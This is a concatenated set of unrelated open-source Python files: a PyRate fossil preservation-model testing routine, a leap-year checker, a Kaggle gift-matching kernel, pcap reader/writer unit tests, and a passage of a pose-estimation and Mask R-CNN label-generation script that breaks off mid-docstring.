the TPP model...\n \"\"\"\n )\n times_q_shift = np.sort(np.array(list(q_shift)+ [ np.maximum(np.max(q_shift),max_time_range_fossils)*10 ] +[0]))[::-1]\n d_size = len(fossil_complete)\n \n # full model\n occs_sp_bin =list()\n for i in range(len(fossil_complete)):\n occs_temp = fossil_complete[i]\n h = np.histogram(occs_temp[occs_temp>0],bins=np.sort( times_q_shift ))[0][::-1]\n occs_sp_bin.append(h) \n # resTPPm = est_s_e_q(fossil_complete,occs_sp_bin,model=2,q_shift_times=times_q_shift,exp_se=1,q0_init=[0.5]*(len(times_q_shift)-1))\n aic_temp = calcAICc(resTPPm[0],len(resTPPm[1]),d_size)\n print(\"Full TPP model\")\n print(\"Lik:\", resTPPm[0], \"AICs:\", aic_temp[0])\n ml_est_rates = np.abs(np.array(resTPPm[1]))\n print(\"Q times:\",times_q_shift[1:], \"\\nRates:\", ml_est_rates)\n \n # aic_best = aic_temp\n def remove_one_shift(times_q_shift,ml_est_rates):\n for irm in range(1,len(times_q_shift)-1):\n print(\"\\nRemoving\", times_q_shift[irm])\n times_temp = times_q_shift[times_q_shift != times_q_shift[irm]]\n occs_sp_bin =list()\n for i in range(len(fossil_complete)):\n occs_temp = fossil_complete[i]\n h = np.histogram(occs_temp[occs_temp>0],bins=np.sort( times_temp ))[0][::-1]\n occs_sp_bin.append(h) \n # optimize rate\n q0 = ml_est_rates[ml_est_rates != ml_est_rates[irm]]\n # print(q0)\n 
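# Refit the TPP model without this shift and compare its AICc with the full\n            # model's; a clearly higher AICc means the removed shift was informative.\n            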
resTPPm = est_s_e_q(fossil_complete,occs_sp_bin,model=2,q_shift_times=times_temp,exp_se=1,q0_init = q0)\n            aic_temp = calcAICc(resTPPm[0],len(resTPPm[1]),d_size)\n            print(\"Lik:\", resTPPm[0],\"AICs:\", aic_temp[0])\n            print(\"Q times:\",times_temp[1:], \"\\nRates:\", np.abs(np.array(resTPPm[1])))\n    \n    remove_one_shift(times_q_shift,ml_est_rates)\n    \n\n\n\ndef run_model_testing_n_shifts(Xdata,q_shift=0,min_n_fossils=2,verbose=1):\n    # data are shifted by 100\n    fossil_complete=[Xdata[i]+0 for i in range(len(Xdata)) if min(Xdata[i])>0 and len(Xdata[i])>=min_n_fossils] # remove extant, and few occs\n    fossil_complete=[fossil_complete[i] for i in range(len(fossil_complete)) if np.max(fossil_complete[i])-np.min(fossil_complete[i])>0.1] # remove too short branches\n    \n    if len(fossil_complete) > 1:\n        pass #print(\"Using\",len(fossil_complete),\"species for model testing\")\n    else:\n        sys.exit(\"The number of lineages meeting the requirements for model testing is insufficient.\")\n    \n    max_time_range_fossils = max([max(i) for i in fossil_complete])\n    min_time_range_fossils = min([min(i) for i in fossil_complete])\n    \n    if q_shift==0: \n        q_shift = [min_time_range_fossils+ (max_time_range_fossils-min_time_range_fossils)/2.]\n    else: \n        q_shift = np.array(q_shift)+0\n    \n    print(\n    \"\"\"\\nTesting the significance of each shift in the TPP model...\n    \"\"\"\n    )\n    times_q_shift = np.sort(np.array(list(q_shift)+ [ np.maximum(np.max(q_shift),max_time_range_fossils)*10 ] +[0]))[::-1]\n    d_size = len(fossil_complete)\n    \n    # full model\n    occs_sp_bin =list()\n    for i in range(len(fossil_complete)):\n        occs_temp = fossil_complete[i]\n        h = np.histogram(occs_temp[occs_temp>0],bins=np.sort( times_q_shift ))[0][::-1]\n        occs_sp_bin.append(h) \n    resTPPm = est_s_e_q(fossil_complete,occs_sp_bin,model=2,q_shift_times=times_q_shift,exp_se=1,q0_init=[0.5]*(len(times_q_shift)-1))\n    aic_temp = calcAICc(resTPPm[0],len(resTPPm[1]),d_size)\n    print(\"\\nLik:\", resTPPm[0], \"AICs:\", aic_temp[0])\n    ml_est_rates = np.abs(np.array(resTPPm[1]))\n    print(\"Q times:\",times_q_shift[1:], \"\\nRates:\", ml_est_rates)\n    \n    # aic_best = aic_temp\n    def remove_one_shift(times_q_shift,ml_est_rates):\n        list_shifts=[]\n        list_rates =[]\n        list_AICs = []\n        for irm in range(1,len(times_q_shift)-1):\n            print(\"\\nRemoving\", times_q_shift[irm])\n            times_temp = times_q_shift[times_q_shift != times_q_shift[irm]]\n            occs_sp_bin =list()\n            for i in range(len(fossil_complete)):\n                occs_temp = fossil_complete[i]\n                h = np.histogram(occs_temp[occs_temp>0],bins=np.sort( times_temp ))[0][::-1]\n                occs_sp_bin.append(h) \n            # optimize rate\n            q0 = ml_est_rates[ml_est_rates != ml_est_rates[irm]]\n            # print(q0)\n            resTPPm = est_s_e_q(fossil_complete,occs_sp_bin,model=2,q_shift_times=times_temp,exp_se=1,q0_init = q0)\n            aic_temp = calcAICc(resTPPm[0],len(resTPPm[1]),d_size)\n            print(\"Lik:\", resTPPm[0],\"AICs:\", aic_temp[0])\n            print(\"Q times:\",times_temp[1:], \"\\nRates:\", np.abs(np.array(resTPPm[1])))\n            list_AICs.append( aic_temp[0] )\n            list_shifts.append( times_temp )\n            list_rates.append( np.abs(np.array(resTPPm[1])) )\n        \n        print(list_AICs,list_shifts,list_rates)\n        return list_AICs[np.argmin(list_AICs)], list_shifts[np.argmin(list_AICs)], list_rates[np.argmin(list_AICs)]\n    \n    # while True:\n    minAIC, bestTimes, bestRates = remove_one_shift(times_q_shift,ml_est_rates)\n    # print((minAIC, aic_best))\n    # if minAIC - aic_best > 4:\n    #     print(\"break\", minAIC, aic_best)\n    #     #if minAIC < aic_best:\n    #     aic_best = minAIC\n    #     times_q_shift = bestTimes\n    #     ml_est_rates = 
bestRates\n","repo_name":"dsilvestro/PyRate","sub_path":"pyrate_lib/PPmodeltest.py","file_name":"PPmodeltest.py","file_ext":"py","file_size_in_byte":17670,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"57"} +{"seq_id":"1169764062","text":"\r\ndef is_year_leap(year):\r\n\r\n if (year%4 == 0 and year%100 != 0) or year%400 == 0:\r\n leap = True\r\n else:\r\n leap = False\r\n\r\n return leap\r\n\r\nyear = int(input(\"Type a year, for leap checking:\"))\r\n\r\nif is_year_leap(year) == False:\r\n print (\"Year \" + str(year) + \" isn't leap\")\r\n\r\nif is_year_leap(year):\r\n print (\"Year \" + str(year) + \" is leap\")\r\n\r\ntest_data = [1900, 2000, 2016, 1987]\r\ntest_results = [False, True, True, False]\r\nfor i in range(len(test_data)):\r\n\tyr = test_data[i]\r\n\tprint(yr,\"->\",end=\"\")\r\n\tresult = is_year_leap(yr)\r\n\tif result == test_results[i]:\r\n\t\tprint(\"OK\")\r\n\telse:\r\n\t\tprint(\"Failed\")","repo_name":"vasylw/python","sub_path":"IsYearLeap.py","file_name":"IsYearLeap.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"71328529777","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n\n# For example, here's several helpful packages to load in \n\n\n\nimport numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\nfrom collections import Counter\n\nimport tqdm\n\n\n\n# Input data files are available in the \"../input/\" directory.\n\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\n\n\nfrom subprocess import check_output\n\nprint(check_output([\"ls\", \"../input\"]).decode(\"utf8\"))\n\n\n\n# Any results you write to the current directory are saved as output.\nchild_prefs = pd.read_csv('../input/child_wishlist.csv', header=None)\n\nchild_prefs = child_prefs.drop(0, axis=1).values\n\n\n\ngift_prefs = pd.read_csv('../input/gift_goodkids.csv', header=None)\n\ngift_prefs = gift_prefs.drop(0, axis=1).values\nn_children = 1000000 # n children to give\n\nn_gift_type = 1000 # n types of gifts available\n\nn_gift_quantity = 1000 # each type of gifts are limited to this quantity\n\nn_child_pref = 10 # number of gifts a child ranks\n\nn_gift_pref = 1000 # number of children a gift ranks\n\ntwins = 4000\n\nratio_gift_happiness = 2\n\nratio_child_happiness = 2\ndef avg_normalized_happiness(pred, child_prefs, gift_prefs):\n\n \n\n # check if number of each gift exceeds n_gift_quantity\n\n gift_counts = Counter(elem[1] for elem in pred)\n\n for count in gift_counts.values():\n\n assert count <= n_gift_quantity\n\n \n\n # check if twins have the same gift\n\n for t1 in range(0,twins,2):\n\n twin1 = pred[t1]\n\n twin2 = pred[t1+1]\n\n assert twin1[1] == twin2[1]\n\n \n\n max_child_happiness = n_child_pref * ratio_child_happiness\n\n max_gift_happiness = n_gift_pref * ratio_gift_happiness\n\n total_child_happiness = 0\n\n total_gift_happiness = np.zeros(n_gift_type)\n\n \n\n for row in tqdm.tqdm(pred):\n\n child_id = row[0]\n\n gift_id = row[1]\n\n \n\n # check if child_id and gift_id exist\n\n assert child_id < n_children\n\n assert gift_id < n_gift_type\n\n assert child_id >= 0 \n\n assert gift_id >= 0\n\n\n\n child_happiness = (n_child_pref - np.where(child_prefs[child_id]==gift_id)[0]) * 
ratio_child_happiness\n\n if not child_happiness:\n\n child_happiness = -1\n\n\n\n gift_happiness = ( n_gift_pref - np.where(gift_prefs[gift_id]==child_id)[0]) * ratio_gift_happiness\n\n if not gift_happiness:\n\n gift_happiness = -1\n\n\n\n total_child_happiness += child_happiness\n\n total_gift_happiness[gift_id] += gift_happiness\n\n \n\n # print(max_child_happiness, max_gift_happiness\n\n print('normalized child happiness=',float(total_child_happiness)/(float(n_children)*float(max_child_happiness)) , \\\n\n ', normalized gift happiness',np.mean(total_gift_happiness) / float(max_gift_happiness*n_gift_quantity))\n\n return float(total_child_happiness)/(float(n_children)*float(max_child_happiness)) + np.mean(total_gift_happiness) / float(max_gift_happiness*n_gift_quantity)\ndef pick_first_choice(child_pref, avail_gifts):\n\n \n\n # preference list (of remaining available gifts)\n\n overlap = set(child_pref) & set(avail_gifts)\n\n child_pref_available = [x for x in child_pref if x in overlap] # preserves pref order\n\n \n\n try: # first pick on the list\n\n return child_pref_available[0]\n\n except: # if prefered gifts aren't available, pick first available\n\n return avail_gifts[0]\ngift_matches = []\n\ngift_counter = np.zeros(n_gift_type)\n\n\n\nfor child in tqdm.tqdm(range(n_children)):\n\n\n\n if child < twins:\n\n if child % 2 == 0: # twin 1\n\n avail_gifts = np.where(gift_counter < n_gift_quantity-1)[0]\n\n chosen_gift = pick_first_choice(child_prefs[child], avail_gifts)\n\n else:\n\n # chosen_gift = chosen_gift # pick same as twin 1\n\n pass\n\n \n\n else: # not twins\n\n avail_gifts = np.where(gift_counter < n_gift_quantity)[0]\n\n chosen_gift = pick_first_choice(child_prefs[child], avail_gifts)\n\n\n\n gift_counter[chosen_gift] += 1\n\n gift_matches.append((child, chosen_gift))\navg_normalized_happiness(gift_matches, child_prefs, gift_prefs)\np = pd.DataFrame(gift_matches, columns=['ChildId', 'GiftId']).set_index('ChildId')\n\np.to_csv('nice_inversion_benchmark.csv')","repo_name":"aorursy/new-nb-8","sub_path":"zeemeen_merging-two-kernels-inversion-s-wendy-s.py","file_name":"zeemeen_merging-two-kernels-inversion-s-wendy-s.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"3086413342","text":"__author__ = 'diarmuid'\nimport sys\nsys.path.append(\"..\")\nimport os\n\nimport unittest\nimport AcraNetwork.Pcap as pcap\nimport AcraNetwork.SimpleEthernet as SimpleEthernet\nimport struct\n\ndef getEthernetPacket(data=0xa):\n e = SimpleEthernet.Ethernet()\n e.srcmac = 0x001122334455\n e.dstmac = 0x998877665544\n e.type = SimpleEthernet.Ethernet.TYPE_IP\n e.payload = struct.pack(\"H\",data)\n return e.pack()\n\nclass PcapBasicTest(unittest.TestCase):\n\n def test_missingfilename(self):\n self.assertRaises(TypeError,lambda: pcap.Pcap())\n\n def test_missingreadfile(self):\n self.assertRaises(IOError,lambda: pcap.Pcap(\"nofile.pcap\"))\n\n def test_defaultMagicNumber(self):\n p = pcap.Pcap(\"_tmp.pcap\",mode='w')\n self.assertEqual(p.magic,0xa1b2c3d4)\n\n def test_defaultVersionMaj(self):\n p = pcap.Pcap(\"_tmp.pcap\",mode='w')\n self.assertEqual(p.versionmaj,2)\n\n def test_defaultVersionMin(self):\n p = pcap.Pcap(\"_tmp.pcap\",mode='w')\n self.assertEqual(p.versionmin,4)\n\n def test_readTestFile(self):\n p = pcap.Pcap(\"test_input.pcap\")\n p.readGlobalHeader()\n self.assertEqual(p.magic,0xa1b2c3d4)\n self.assertEqual(p.network,1)\n self.assertEqual(p.sigfigs,0)\n 
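The per-child term in avg_normalized_happiness reduces to a small lookup: a gift at wishlist position p scores (n_child_pref - p) * ratio, and an unlisted gift scores -1. A standalone sketch with an illustrative wishlist (the values are not from the competition data):

import numpy as np

def child_happiness(wishlist, gift_id, n_child_pref=10, ratio_child_happiness=2):
    # rank 0 (favourite) scores 20, rank 9 scores 2, unlisted gifts score -1
    hit = np.where(wishlist == gift_id)[0]
    if hit.size == 0:
        return -1
    return int((n_child_pref - hit[0]) * ratio_child_happiness)

wishlist = np.array([7, 3, 42, 0, 9, 11, 5, 8, 2, 1])  # illustrative preferences
assert child_happiness(wishlist, 42) == 16  # third pick: (10 - 2) * 2
assert child_happiness(wishlist, 99) == -1  # not on the wishlist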
self.assertEqual(p.snaplen,262144)\n self.assertEqual(p.versionmaj,2)\n self.assertEqual(p.versionmin,4)\n self.assertEqual(p.zone,0)\n self.assertEqual(p.filesize,704)\n p.close()\n\n\n\n def test_readARecord(self):\n p = pcap.Pcap(\"test_input.pcap\")\n p.readGlobalHeader()\n mypcaprecord = p.readAPacket()\n self.assertEqual(mypcaprecord.sec,1419678111)\n self.assertEqual(mypcaprecord.usec,811463)\n self.assertEqual(mypcaprecord.orig_len,70)\n self.assertEqual(mypcaprecord.incl_len,70)\n\n def test_writeARecord(self):\n p = pcap.Pcap(\"_tmp.pcap\",mode='w')\n p.writeGlobalHeader()\n r = pcap.PcapRecord()\n r.setCurrentTime()\n r.packet = getEthernetPacket(0xa)\n p.writeARecord(r)\n p.close()\n p = pcap.Pcap(\"_tmp.pcap\")\n p.readGlobalHeader()\n self.assertEqual(p.magic,0xa1b2c3d4)\n self.assertEqual(p.network,1)\n self.assertEqual(p.sigfigs,0)\n self.assertEqual(p.snaplen,65535)\n self.assertEqual(p.versionmaj,2)\n self.assertEqual(p.versionmin,4)\n self.assertEqual(p.zone,0)\n self.assertEqual(p.filesize,56)\n p.close()\n os.remove(\"_tmp.pcap\")\n\n def test_appendARecord(self):\n p = pcap.Pcap(\"_tmp2.pcap\",mode='w')\n p.writeGlobalHeader()\n r = pcap.PcapRecord()\n r.setCurrentTime()\n r.packet = getEthernetPacket(0xa)\n p.writeARecord(r)\n p.close()\n # Now try to append a record\n p = pcap.Pcap(\"_tmp2.pcap\",mode='a')\n r.packet = getEthernetPacket(0xb)\n p.writeARecord(r)\n p.close()\n # Read back to verify\n p = pcap.Pcap(\"_tmp2.pcap\")\n p.readGlobalHeader()\n self.assertEqual(p.filesize,88)\n rec1 = p.readAPacket()\n rec2 = p.readAPacket()\n e = SimpleEthernet.Ethernet()\n e.unpack(rec1.packet)\n self.assertEqual(e.payload,struct.pack(\"H\",0xa))\n e.unpack(rec2.packet)\n self.assertEqual(e.payload,struct.pack(\"H\",0xb))\n p.close()\n os.remove(\"_tmp2.pcap\")\n\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"Python3pkg/AcraNetwork","sub_path":"test/test_pcap.py","file_name":"test_pcap.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"15158928899","text":"import argparse\nimport glob\nimport os\nfrom pathlib import Path\nfrom typing import List\n\nimport cv2\nimport detectron2.data.transforms as T\nimport numpy as np\nimport openpifpaf\nimport torch\nimport tqdm\nfrom detectron2.checkpoint import DetectionCheckpointer\nfrom detectron2.config import CfgNode, get_cfg\nfrom detectron2.model_zoo import get_checkpoint_url, get_config_file\nfrom detectron2.modeling import build_model\nfrom detectron2.structures import Instances\nfrom torch.utils.data import DataLoader, Dataset\n\n\ndef build_config_maskrcnn(model_config_name):\n cfg = get_cfg()\n cfg.merge_from_file(cfg_filename=get_config_file(model_config_name))\n cfg.MODEL.WEIGHTS = get_checkpoint_url(model_config_name)\n cfg.MODEL.DEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'\n return cfg\n\n\ndef compare_arrays(array1, array2):\n \"\"\"\n Compare two arrays and calculate Mean Absolute Error (MAE) and percentage difference.\n\n Args:\n array1 (np.ndarray): First array.\n array2 (np.ndarray): Second array.\n\n Returns:\n mae (float): Mean Absolute Error (MAE) between the arrays.\n mae_percentage (float): Percentage difference between the arrays.\n \"\"\"\n\n def calculate_mae(array1, array2):\n # Calculate Mean Absolute Error (MAE)\n mae = np.mean(np.abs(array1 - array2))\n mae_percentage = (mae / np.max(array1)) * 100\n return mae, mae_percentage\n\n print(f\"Average percentage difference: 
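The header fields asserted in these tests (magic 0xa1b2c3d4, version 2.4, snaplen, network type) follow the standard libpcap global header layout. A short sketch of packing and unpacking that 24-byte header with the stdlib struct module, independent of the AcraNetwork API:

import struct

# magic, version major/minor, timezone, sigfigs, snaplen, link type
PCAP_GLOBAL_HDR = "<IHHiIII"

hdr = struct.pack(PCAP_GLOBAL_HDR, 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
magic, vmaj, vmin, zone, sigfigs, snaplen, network = struct.unpack(PCAP_GLOBAL_HDR, hdr)
assert (magic, vmaj, vmin, network) == (0xA1B2C3D4, 2, 4, 1)  # network 1 == Ethernet
assert len(hdr) == 24  # the 24-byte global header the tests read back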
{calculate_mae(array1, array2)[1]}%\")\n\n\ndef get_image_paths(source, path_format=False):\n \"\"\"\n Get the paths of all image files in a directory.\n\n Args:\n source (str): Directory path.\n path_format (bool, optional): Return paths as Path objects if True, otherwise as strings. Default is False.\n\n Returns:\n image_paths (List[str or Path]): List of image file paths.\n \"\"\"\n image_paths = glob.glob(f\"{source}/**/*.[jJ][pP][gG]\", recursive=True) + \\\n glob.glob(f\"{source}/**/*.[pP][nN][gG]\", recursive=True) + \\\n glob.glob(f\"{source}/**/*.[jJ][pP][eE][gG]\", recursive=True) + \\\n glob.glob(f\"{source}/**/*.[tT][iI][fF]\", recursive=True) + \\\n glob.glob(f\"{source}/**/*.[tT][iI][fF][fF]\", recursive=True)\n if path_format:\n image_paths = [Path(path_str) for path_str in image_paths]\n return image_paths\n\n\ndef format_path(img_path, dataset_dir):\n \"\"\"\n Formats the given image path based on the dataset directory.\n\n Args:\n img_path (str): The path of the image file.\n dataset_dir (str): The directory path of the dataset.\n\n Returns:\n str: The formatted path of the image file.\n \"\"\"\n if \"occluded_reid\" in dataset_dir.lower() or \"occluded-reid\" in dataset_dir.lower():\n return os.path.join(os.path.basename(os.path.dirname(os.path.dirname(img_path))), os.path.basename(img_path))\n elif \"p-dukemtmc_reid\" in dataset_dir.lower() or \"p-dukemtmc-reid\" in dataset_dir.lower():\n return os.path.join(os.path.basename(os.path.dirname(os.path.dirname(os.path.dirname(img_path)))),\n os.path.basename(os.path.dirname(os.path.dirname(img_path))), os.path.basename(img_path))\n return os.path.relpath(img_path, dataset_dir)\n\n\ndef get_label_paths(is_mask, img_paths, dataset_dir):\n \"\"\"\n Get the paths of label files corresponding to the image paths.\n\n Args:\n is_mask (bool): Indicates if the label is a mask or not.\n img_paths (List[str]): List of image file paths.\n dataset_dir (str): Directory path of the dataset.\n\n Returns:\n relative_paths (List[str]): List of relative paths of the image files.\n file_paths (List[str]): List of label file paths.\n \"\"\"\n relative_paths, file_paths = [], []\n for img_name in img_paths:\n relative_path = format_path(img_name, dataset_dir)\n if not is_mask:\n file_path = os.path.join(dataset_dir, \"masks\", \"pifpaf\", relative_path + \".confidence_fields.npy\")\n else:\n file_path = os.path.join(dataset_dir, \"masks\", \"pifpaf_maskrcnn_filtering\", relative_path + \".npy\")\n relative_paths.append(relative_path)\n file_paths.append(file_path)\n return relative_paths, file_paths\n\n\ndef skip_existing(is_mask, imagery, dataset_dir):\n \"\"\"\n Filter out image paths for which label files already exist.\n\n Args:\n is_mask (bool): Indicates if the label is a mask or not.\n imagery (List[str]): List of image file paths.\n dataset_dir (str): Directory path of the dataset.\n\n Returns:\n new_imagery (List[str]): List of image file paths for which label files do not exist.\n \"\"\"\n relative_paths, file_paths = get_label_paths(is_mask=is_mask, img_paths=imagery, dataset_dir=dataset_dir)\n new_imagery = []\n for index, file_path in enumerate(file_paths):\n if not os.path.exists(file_path):\n new_imagery.append(imagery[index])\n return new_imagery\n\n\ndef save_files(files, files_path, verbose=True):\n \"\"\"\n Save files to specified paths.\n\n Args:\n files (List[object]): List of files to be saved.\n files_path (List[str]): List of paths where files will be saved.\n verbose (bool, optional): Print progress if True. 
Default is True.\n \"\"\"\n for file, file_path in zip(files, files_path):\n os.makedirs(os.path.dirname(file_path), exist_ok=True)\n np.save(file_path, file)\n if verbose:\n print(f\"Processed {os.path.basename(file_path)}\")\n\n\nclass ImageDataset(Dataset):\n \"\"\"\n Custom dataset class for loading images.\n\n Args:\n imagery (List[Path]): List of image file paths.\n\n Returns:\n (str, np.ndarray): Tuple containing the image file path and the loaded image.\n \"\"\"\n\n def __init__(self, imagery: List[Path]):\n self.imagery = imagery\n\n def __getitem__(self, index):\n return self.imagery[index], cv2.imread(str(self.imagery[index]))\n\n def __len__(self):\n return len(self.imagery)\n\n\nclass BatchPifPaf:\n def __init__(self, model_name: str = \"shufflenetv2k16\", batch_size: int = None, workers: int = None):\n \"\"\"\n Initializes a BatchPifPaf object.\n\n Args:\n model_name (str): Name of the OpenPifPaf model to use.\n batch_size (int): Batch size for inference.\n workers (int): Number of workers for data loading.\n \"\"\"\n models = [\n 'resnet50',\n 'shufflenetv2k16',\n 'shufflenetv2k30',\n ]\n assert model_name in models, f\"Model name must be one of {models}\"\n\n print(f\"* OpenPifPaf model -> {model_name}\")\n # Define the OpenPifPaf model\n self.model = openpifpaf.Predictor(checkpoint=model_name, visualize_image=True, visualize_processed_image=True)\n self.batch_size = batch_size if batch_size else self.model.batch_size\n self.workers = workers if workers else self.model.loader_workers if self.model.loader_workers is not None else 0\n self.__collate = openpifpaf.datasets.collate_images_anns_meta\n\n def __call__(self, imagery: List[Path] or List[str], dataset_dir: List[Path] or List[str],\n is_overwrite: bool = False, verbose: bool = False):\n \"\"\"\n Perform batch processing on the given imagery using the OpenPifPaf model.\n\n Args:\n imagery (List[Path] or List[str]): List of image paths or image file names.\n dataset_dir (List[Path] or List[str]): List of dataset directories.\n is_overwrite (bool, optional): Whether to overwrite existing files. Defaults to False.\n verbose (bool, optional): Whether to print verbose information. 
Defaults to False.\n\n Yields:\n torch.Tensor: Predictions for each image as a NumPy array.\n \"\"\"\n\n assert len(imagery) > 0, \"No images found in imagery.\"\n\n if not is_overwrite:\n imagery = skip_existing(False, imagery, dataset_dir)\n\n dataset = openpifpaf.datasets.ImageList(\n imagery,\n preprocess=self.model.preprocess,\n with_raw_image=True\n )\n loader = DataLoader(\n dataset,\n self.batch_size,\n shuffle=False,\n pin_memory=self.model.device.type != 'cpu',\n num_workers=self.workers,\n collate_fn=self.__collate,\n )\n\n total_batches = len(loader)\n progress_bar = tqdm.tqdm(total=total_batches, desc=\"Processing\", unit=\"batch\")\n\n with torch.no_grad():\n for batch in loader:\n if len(batch) == 3:\n processed_image_batch, gt_anns_batch, meta_batch = batch\n elif len(batch) == 4:\n image_batch, processed_image_batch, gt_anns_batch, meta_batch = batch\n\n # Specify the file path where you want to save the .npy file\n relative_paths, file_paths = get_label_paths(False, [d[\"file_name\"] for d in meta_batch], dataset_dir)\n\n # Obtain the confidence values (pifpaf_conf) for the processed image batch\n pifpaf_conf: torch.Tensor = self.__get_pifpaf_conf(processed_image_batch)\n\n # Save the NumPy array to the .npy file\n save_files(pifpaf_conf.numpy(), file_paths, verbose)\n\n progress_bar.update(1)\n\n progress_bar.close()\n\n def __get_pifpaf_conf(self, processed_image_batch: Instances):\n \"\"\"\n Get the confidence scores from the processed image batch.\n\n Args:\n processed_image_batch (Instances): Processed image batch containing pose estimation fields.\n\n Returns:\n torch.Tensor: Confidence scores for keypoints and connections.\n \"\"\"\n # Retrieve the pose estimation fields from the model processor\n fields_batch = self.model.processor.fields_batch(self.model.model, processed_image_batch,\n device=self.model.device)\n\n # Extract the pif (keypoint) and paf (connection) fields from the batch\n pif, paf = zip(*fields_batch)\n\n # Extract the confidence scores for keypoints (index 1 in each field)\n pif_confidence_scores = torch.stack(pif)[:, :, 1]\n paf_confidence_scores = torch.stack(paf)[:, :, 1]\n\n # Concatenate the confidence scores for keypoints and connections\n pifpaf_confidence_scores = torch.cat((pif_confidence_scores, paf_confidence_scores), dim=1)\n\n # Return the concatenated confidence scores\n return pifpaf_confidence_scores\n\n\nclass BatchMask:\n def __init__(self, cfg: CfgNode or str, batch_size: int = None, workers: int = None):\n \"\"\"\n Initialize the BatchMask class for performing batched instance segmentation using a Mask R-CNN model.\n\n Args:\n cfg (CfgNode or str): Configuration options for the Mask R-CNN model.\n batch_size (int, optional): Batch size for processing images. Defaults to None.\n workers (int, optional): Number of worker processes for data loading. 
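The tensor bookkeeping in __get_pifpaf_conf is easy to check in isolation: stack the per-image field tensors, slice out the confidence plane (index 1), then concatenate keypoint and association channels. A sketch with illustrative shapes (the real CIF/CAF field dimensions depend on the checkpoint):

import torch

pif = [torch.rand(17, 5, 21, 13) for _ in range(4)]  # per image: 17 keypoint fields, 5 planes each
paf = [torch.rand(19, 9, 21, 13) for _ in range(4)]  # per image: 19 association fields, 9 planes each

pif_conf = torch.stack(pif)[:, :, 1]  # (4, 17, 21, 13): confidence plane only
paf_conf = torch.stack(paf)[:, :, 1]  # (4, 19, 21, 13)
both = torch.cat((pif_conf, paf_conf), dim=1)
assert both.shape == (4, 36, 21, 13)  # keypoint + association confidences per image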
Defaults to None.\n \"\"\"\n # Clone the provided configuration or get a default configuration\n self.cfg = build_config_maskrcnn(cfg) if isinstance(cfg, str) else cfg.clone()\n print(f\"* MaskRCNN model -> {cfg if isinstance(cfg, str) else self.cfg.MODEL.WEIGHTS}\")\n\n # Set the batch size for processing images, defaulting to 32 if not provided\n self.batch_size = batch_size if batch_size else 32\n\n # Set the number of worker processes for data loading, defaulting to the number of CPU cores\n self.workers = workers if workers is not None else 0\n\n # Build the Mask R-CNN model\n self.model = build_model(self.cfg)\n\n # Set the model to evaluation mode\n self.model.eval()\n\n # Load the pre-trained weights for the model\n checkpointer = DetectionCheckpointer(self.model)\n checkpointer.load(self.cfg.MODEL.WEIGHTS)\n\n # Define the augmentation transform for resizing images\n self.aug = T.ResizeShortestEdge(\n [self.cfg.INPUT.MIN_SIZE_TEST, self.cfg.INPUT.MIN_SIZE_TEST],\n self.cfg.INPUT.MAX_SIZE_TEST\n )\n\n # Set the input image format to RGB or BGR based on the configuration\n self.input_format = self.cfg.INPUT.FORMAT\n assert self.input_format in [\"RGB\", \"BGR\"], self.input_format\n\n def __collate(self, batch):\n \"\"\"\n Collates a batch of images and their paths for use in data loading.\n\n Args:\n batch (list): A list of tuples containing image paths and corresponding images.\n\n Returns:\n tuple: A tuple containing two lists: the paths of the images and the processed data.\n\n \"\"\"\n paths, data = [], []\n for path, image in batch:\n if self.input_format == \"RGB\":\n # Convert image format from RGB to BGR if required by the model\n image = image[:, :, ::-1]\n height, width = image.shape[:2]\n\n # Apply augmentation and transformation to the image\n image = self.aug.get_transform(image).apply_image(image)\n image = image.astype(\"float32\").transpose(2, 0, 1)\n image = torch.as_tensor(image)\n data.append({\"image\": image, \"height\": height, \"width\": width})\n paths.append(path)\n return paths, data\n\n def __call__(self, imagery: List[Path] or List[str], dataset_dir: List[Path] or List[str],\n is_overwrite: bool = False, verbose: bool = False):\n \"\"\"\n Perform the batch processing of imagery to generate and save mask files.\n\n Args:\n imagery (List[Path] or List[str]): A list of image paths or image filenames.\n dataset_dir (List[Path] or List[str]): A list of dataset directories.\n is_overwrite (bool, optional): Whether to overwrite existing mask files. Defaults to False.\n verbose (bool, optional): Whether to print verbose information. 
Defaults to False.\n\n \"\"\"\n assert len(imagery) > 0, \"No images found in imagery.\"\n\n if not is_overwrite:\n # Skip existing images if overwrite is disabled\n imagery = skip_existing(True, imagery, dataset_dir)\n\n # Create an instance of the ImageDataset class\n dataset = ImageDataset(imagery)\n\n # Create a data loader for batch processing\n loader = DataLoader(\n dataset,\n self.batch_size,\n shuffle=False,\n num_workers=self.workers,\n collate_fn=self.__collate,\n pin_memory=True\n )\n\n total_batches = len(loader)\n progress_bar = tqdm.tqdm(total=total_batches, desc=\"Processing\", unit=\"batch\")\n\n with torch.no_grad():\n for paths, batch in loader:\n # Get the paths and file paths for saving the mask files\n relative_paths, pifpaf_file_paths = get_label_paths(is_mask=False, img_paths=paths,\n dataset_dir=dataset_dir)\n\n assert all(os.path.exists(path) for path in\n pifpaf_file_paths), \"Some PiPaf Label File ('.confidence_fields.npy') does not exist!\"\n\n # Filter the predictions using the mask files\n pifpaf_filtered: List[np.ndarray] = self.__filter_pifpaf_with_mask(batch, pifpaf_file_paths)\n\n # Get the file paths for saving the mask files\n _, mask_file_paths = get_label_paths(is_mask=True, img_paths=paths, dataset_dir=dataset_dir)\n\n # Save the filtered mask files\n save_files(pifpaf_filtered, mask_file_paths, verbose)\n\n progress_bar.update(1)\n\n progress_bar.close()\n\n def __filter_pifpaf_with_mask(self, batch,\n pifpaf_file_paths: List[Path] or List[str]):\n \"\"\"\n Filter PifPaf predictions using segmentation masks.\n\n Args:\n paths (List[Path] or List[str]): List of image paths or filenames.\n batch: Batch data containing images.\n pifpaf_file_paths (List[Path] or List[str]): List of PifPaf label file 